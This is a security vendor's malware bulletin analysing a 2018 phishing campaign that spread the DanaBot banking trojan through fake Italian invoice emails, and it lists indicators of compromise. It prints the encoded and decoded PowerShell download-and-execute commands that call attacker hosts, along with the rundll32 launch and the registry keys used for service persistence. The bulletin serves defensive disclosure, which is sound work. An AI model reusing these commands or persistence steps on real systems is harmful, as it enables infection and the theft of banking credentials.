|
TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email included in a campaign spreading the malware Trojan Banker DanaBot sent on November 13, 2018.
Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
|
INDEX
|
Fake Mail spreads Trojan "DanaBot"
Name:DanaBot
Malware family: Banker
VirIT: Trojan.Win32.DanaBot
Description:
The email was detected on November 13, 2018
Example of examined email:
|
Subject: invoice n11395_18_11
|
immagine_1
|
| |
How it spreads:
The malware spreads via deceptive e-mails in which we are notified of a
Nxxxxxx invoice containing the attachment
fattura[numero_casuale].rar.
Unpacking the rar archive inside, we find the file
fattura[numero_casuale].vbs which, when executed, will initiate the infection mechanism.
When the
fattura[numero_casuale].vbs file is executed, nothing seems to happen. Actually the file is running and waiting for 15 minutes before downloading the payload via the following powershell command encoded :
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu
AFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AH
IAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQBwAGgAYQBuAHQA
YwBlAGwAbAAuAHMAdABvAHIAZQA6ADQANAAzAC8AYwBoAGsAZQBzAG8Acw
BvAGQALwBkAG8AdwBuAHMALwB0AFMAeABXACcAKQA7AA==
|
Where its decoded value is as follows:
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IEX (New-Object Net.WebClient).DownloadString
('https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW');
|
And makes the connection to the site:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
from which it downloads the dll KpcLIimT.dll
The newly downloaded KpcLIimT.dll will be saved in the user's %Temp% folder.
- File Name: KpcLIimT.dll
- Size: 450.645 byte
- Md5: 6E7460AD7C963480984C6ACDAFAAFEFD
After downloading the
KpcLIimT.dll the process will be created:
|
C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"
|
Using the registry key :
[HKCU\Software\Classes\mscfile\shell\open\command]
"C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"
the file fattura[numero_casuale].vbs launches an additional powershell command encrypted as follows:
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuA
CcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAMQA5ADIALgAzAC4AMwAxAC4AMg
AxADEAJwA7ACAASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU
AYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBo
AHQAdABwADoALwAvACcAIAArACAAJABoAG8AcwB0AG4AYQBtAGUAIAArACAAJABwAGEAd
ABoACkAOwA=
|
with the following decrypted value
|
$path = '/fax.php?id=admin';
$hostname =192.3.31.211';IEX(NewObjectNet.Webclient).downloadstring('http://' + $hostname + $path);
|
connecting to the address :
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin
and re-downloading the file KpcLIimT.dll.
This will download the
C44AF232.dll into
C:\PROGRA~2\C44AF257.
- File Name: C44AF232.dll
- Size: 1702.928 byte
- Md5: 5E5059614600B07F8D4C1DFD38FE345E
After the download, the dll is automatically executed as a system service, exploiting the operating system's
svchost.exe process. This way it is not easily detectable and guarantees the execution of the malware every time the pc is used, writing the following keys in the registry:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232]
"DisplayName"="@%SystemRoot%\\system32\\Sens.dll,-200"
"Group"="ProfSvc_Group"
"ObjectName"="LocalSystem"
"Description"="@%SystemRoot%\\system32\\Sens.dll,-201"
"Type"="dword:00000110"
"Start"="dword:00000002"
"ErrorControl"="dword:00000001"
"ImagePath"="C:\Windows\system32\svchost.exe -k LocalService"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232\Parameters]
"ServicesDll"="C:\PROGRA~2\C44AF257\C44AF232.DLL"
Trojan.Win32.DanaBot is a member of the Banker macrofamily and its peculiarities are :
- To steal logins and passwords to access important sites such as home banking, e-mail, ftp etc...
- To allow the attacker to control the pc remotely.
IOC
MD5:
818CF570A341F7AC8723DD5E8103345D
6E7460AD7C963480984C6ACDAFAAFEFD
5E5059614600B07F8D4C1DFD38FE345E
URL:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin
How to identify a fake email
Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of
ZIP-formatted attachments and, if possible, DO NOT enable automatic
macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening
Word and
Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a
Banker, the advice from TG Soft's C.R.A.M., is to take appropriate security precautions
even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the wokstation involved is used for home-banking transactions, an assessment with your
credit institution is also recommended.
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts
Sending materials to the TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
- Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
- Save the e-mail to be sent to TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,
Vir.IT eXplorer Lite has the following special features: |
 |
- freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
- It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
- Through the Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and proceed to send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website..
For Vir.IT eXplorer PRO users...
 |
For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTS. |
C.R.A.M.
TG Soft's Anti-Malware Research Center
Back to top of page
